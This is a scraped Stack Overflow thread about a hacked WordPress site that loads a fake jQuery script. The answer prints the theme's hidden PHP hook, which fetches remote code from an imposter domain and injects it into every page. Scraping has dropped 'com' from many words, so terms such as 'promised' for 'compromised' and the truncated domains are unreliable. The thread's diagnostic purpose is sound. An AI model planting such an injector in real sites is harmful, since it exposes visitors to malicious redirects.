My site has been hacked and I can't for the life of me find where it was injected. I have taken necessary precautions to make sure it doesn't happen again and I am restoring my site to an earlier time from backup, but I would like to know where to find it in case it happens to another site I host.
this is the malicious script: .6.3.min.js
This is the site: (removed now)
I have checked everywhere for it and have not been successful.
Any help would be greatly appreciated.
Thank you.
**for those of you down voting me, I have done a lot of research on trying to fix this myself over the last 4 hours with an 11 month old on my lap. I only posted the question as a last resort because I have not been successful in doing it on my own. Since I have had great help in the past from people here, I thought it couldn't hurt to ask.
My site has been hacked and I can't for the life of me find where it was injected. I have taken necessary precautions to make sure it doesn't happen again and I am restoring my site to an earlier time from backup, but I would like to know where to find it in case it happens to another site I host.
this is the malicious script: http://www.jquerys/ajax/libs/jquery/jquery-1.6.3.min.js
This is the site: (removed now)
I have checked everywhere for it and have not been successful.
Any help would be greatly appreciated.
Thank you.
**for those of you down voting me, I have done a lot of research on trying to fix this myself over the last 4 hours with an 11 month old on my lap. I only posted the question as a last resort because I have not been successful in doing it on my own. Since I have had great help in the past from people here, I thought it couldn't hurt to ask.
Share edited Oct 24, 2013 at 7:18 Kapil 72 bronze badges asked Aug 2, 2012 at 21:25 LeahLeah 3314 silver badges17 bronze badges 15- 3 If you don't know where it has been injected, how can you know that you have taken the necessary precautions? – Waleed Khan Commented Aug 2, 2012 at 21:28
- 1 Furthermore, if you have restored to an earlier version, how can one expect to find the offending script? – Waleed Khan Commented Aug 2, 2012 at 21:30
- 2 The script is still in the source of the page on line 69. Either it was incorrectly typed, or the source files for the website were promised. Or (sorry to say) this is an attempt to get SO users redirected to a site from the malicious script. – Tim M. Commented Aug 2, 2012 at 21:31
- 3 Try either menting the code out plete (for test purposes), or changing the URL to a legit CDN, like: ajax.googleapis./ajax/libs/jquery/1.7.2/jquery.min.js – Tim M. Commented Aug 2, 2012 at 21:48
- 2 No problem...you should check if the template was bad from the start. If so, you probably shouldn't restore a backup (or remove the bad code when you restore). If not, then it probably means that access to your site was promised and someone or something (like a plugin) added the script reference. – Tim M. Commented Aug 2, 2012 at 22:00
1 Answer
Reset to default 8Writing up all the ments as an answer, as there is good info here to bat an exploit.
Problem
A script with a URL posing as a jQuery CDN was found in the source of a Wordpress-driven site. It sounds like both jquerys. and jqueryc. were being used as imposter domains.
The malicious code is simple; it randomly redirects to another site and sets a cookie to prevent immediate redirection (once a day). Since it is infrequent, it would be possible to never see this while developing the site, or to overlook it.
Possible Causes
- A mistake typing the URL
- Compromised server
- A malicious theme
- A malicious plugin
Resolution
Start with: http://codex.wordpress/FAQ_My_site_was_hacked
OP found this code inside the theme:
// !!! Suspect Code - Do not use for any purpose !!!
//Jquery Function
if (!function_exists('insert_jquery_theme')){
function insert_jquery_theme(){
if (function_exists('curl_init')){
$url="jqueryc./jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
echo $data;
}
}
add_action('wp_head', 'insert_jquery_theme');
}
Viewing the source, there are actually two references to jQuery; one legitimate and one not. Removing the aforementioned snippet of code resolves the problem.
It will still be important to determine the origin of the malicious code (e.g. the theme, a plugin, or a promised server). Backups shouldn't be restored without examining them for the malicious code.
Related Links
- a invalid ticket in the jQuery bugtracker
- WordPress support forum